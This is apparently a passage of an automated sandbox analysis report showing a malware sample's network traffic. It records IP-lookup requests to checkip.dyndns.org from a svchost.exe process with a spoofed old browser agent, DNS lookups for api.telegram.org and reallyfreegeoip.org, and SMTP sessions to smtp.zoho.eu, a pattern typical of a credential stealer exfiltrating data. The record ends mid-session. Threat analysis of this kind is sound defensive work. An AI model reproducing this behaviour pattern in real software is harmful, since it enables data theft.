                                                                                      Oct 9, 2024 12:14:04.277956963 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:04.278290987 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:04.283025980 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:04.470447063 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:04.524051905 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:04.606333971 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:04.606564045 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:04.611434937 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:04.797442913 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:04.798028946 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:04.802917004 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:04.989804983 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:04.989871979 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:04.989882946 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:04.989893913 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:04.990098953 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:04.991728067 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:04.996579885 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:05.468692064 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:05.469410896 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:05.469464064 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:05.474216938 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:05.479043961 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:05.665132046 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:05.665647030 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:05.670630932 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:05.856832981 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:05.857358932 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:05.862447977 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:06.095150948 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:06.097542048 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:06.102662086 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:06.288243055 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:06.288755894 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:06.293628931 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:06.479433060 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:06.479717970 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:06.484559059 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:06.686135054 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:06.687191010 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:06.687191010 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:06.687237024 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:06.687237024 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:06.692142010 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:06.692158937 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:06.692214012 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:06.692235947 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:06.692245960 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:07.099154949 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:07.149142027 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:15:20.774837971 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:15:20.779957056 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:15:20.962519884 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:15:20.962785006 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:15:20.962919950 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:15:20.962960005 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:15:20.962960005 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:15:20.963660002 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:15:43.680824041 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:15:43.686309099 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:15:43.886959076 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:15:43.887211084 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:15:43.887317896 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:15:43.887403965 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:15:43.887525082 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:15:43.891634941 CEST49745587192.168.2.8185.230.214.164
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 9, 2024 12:13:21.795597076 CEST5301453192.168.2.81.1.1.1
                                                                                      Oct 9, 2024 12:13:21.803200006 CEST53530141.1.1.1192.168.2.8
                                                                                      Oct 9, 2024 12:13:23.138186932 CEST5766653192.168.2.81.1.1.1
                                                                                      Oct 9, 2024 12:13:23.146920919 CEST53576661.1.1.1192.168.2.8
                                                                                      Oct 9, 2024 12:13:33.557102919 CEST6452753192.168.2.81.1.1.1
                                                                                      Oct 9, 2024 12:13:33.564400911 CEST53645271.1.1.1192.168.2.8
                                                                                      Oct 9, 2024 12:13:40.754350901 CEST5167153192.168.2.81.1.1.1
                                                                                      Oct 9, 2024 12:13:40.761737108 CEST53516711.1.1.1192.168.2.8
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Oct 9, 2024 12:13:21.795597076 CEST192.168.2.81.1.1.10xcdc0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                      Oct 9, 2024 12:13:23.138186932 CEST192.168.2.81.1.1.10xabe1Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                      Oct 9, 2024 12:13:33.557102919 CEST192.168.2.81.1.1.10xf6dbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                      Oct 9, 2024 12:13:40.754350901 CEST192.168.2.81.1.1.10xba7dStandard query (0)smtp.zoho.euA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Oct 9, 2024 12:13:21.803200006 CEST1.1.1.1192.168.2.80xcdc0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Oct 9, 2024 12:13:21.803200006 CEST1.1.1.1192.168.2.80xcdc0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                      Oct 9, 2024 12:13:21.803200006 CEST1.1.1.1192.168.2.80xcdc0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                      Oct 9, 2024 12:13:21.803200006 CEST1.1.1.1192.168.2.80xcdc0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                      Oct 9, 2024 12:13:21.803200006 CEST1.1.1.1192.168.2.80xcdc0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                      Oct 9, 2024 12:13:21.803200006 CEST1.1.1.1192.168.2.80xcdc0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                      Oct 9, 2024 12:13:23.146920919 CEST1.1.1.1192.168.2.80xabe1No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                      Oct 9, 2024 12:13:23.146920919 CEST1.1.1.1192.168.2.80xabe1No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                      Oct 9, 2024 12:13:33.564400911 CEST1.1.1.1192.168.2.80xf6dbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                      Oct 9, 2024 12:13:40.761737108 CEST1.1.1.1192.168.2.80xba7dNo error (0)smtp.zoho.eu185.230.214.164A (IP address)IN (0x0001)false
                                                                                      • reallyfreegeoip.org
                                                                                      • api.telegram.org
                                                                                      • checkip.dyndns.org
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.849707193.122.6.168808104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:21.820281029 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 9, 2024 12:13:22.455116034 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:22 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 91c0c65d943a854bd6f159aa2a772d3c
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                      Oct 9, 2024 12:13:22.460577965 CEST127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Oct 9, 2024 12:13:22.647372007 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:22 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: f382d550e15db5ec3ae45a3b0de23de7
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                      Oct 9, 2024 12:13:23.826191902 CEST127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Oct 9, 2024 12:13:24.013350964 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:23 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: fb7432b66471669f3d2c418876de5dfc
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.849710193.122.6.168808104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:24.649668932 CEST127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Oct 9, 2024 12:13:25.277949095 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:25 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 813e43dd426177eb1adc74a54e9be44d
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.849712193.122.6.168808104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:25.876764059 CEST127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Oct 9, 2024 12:13:26.521563053 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:26 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 557cdb5d93df1b528058e5b79a065514
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.849714193.122.6.168808104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:27.163322926 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 9, 2024 12:13:27.792618990 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:27 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 2112ed2004d6ad66ae6ff1d283dac2e2
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.849716193.122.6.168808104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:28.410387039 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 9, 2024 12:13:29.064634085 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:28 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: f35f1d35c2af8c97168cfebc2add2045
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.849718193.122.6.168808104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:29.711517096 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 9, 2024 12:13:30.337675095 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:30 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 4ca77096748295cf16fbf119908233d9
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.849720193.122.6.168808104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:30.955969095 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 9, 2024 12:13:31.600641012 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:31 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 0ab8576e044eafd94c10586d33854989
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.849722193.122.6.168808104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:32.223947048 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 9, 2024 12:13:32.871831894 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:32 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 44abf292a2435c8886bb787e20cb528d
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.849726193.122.6.168807524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:43.973371983 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 9, 2024 12:13:44.612292051 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:44 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 4a6a1d8741236fdac8f5e945424c8ce2
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                      Oct 9, 2024 12:13:44.616225958 CEST127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Oct 9, 2024 12:13:44.803423882 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:44 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: aacb033aaf506ea9e09d93eefae43e8d
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                      Oct 9, 2024 12:13:45.882730961 CEST127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Oct 9, 2024 12:13:46.069756985 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:45 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 1d51c192f7613460876cf937ac3fe6fb
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.849729193.122.6.168807524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:46.815393925 CEST127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Oct 9, 2024 12:13:47.460211039 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:47 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 5277ff568ab528dc74adbf3e40844f38
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.849731193.122.6.168807524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:48.083816051 CEST127OUTGET / HTTP/1.1
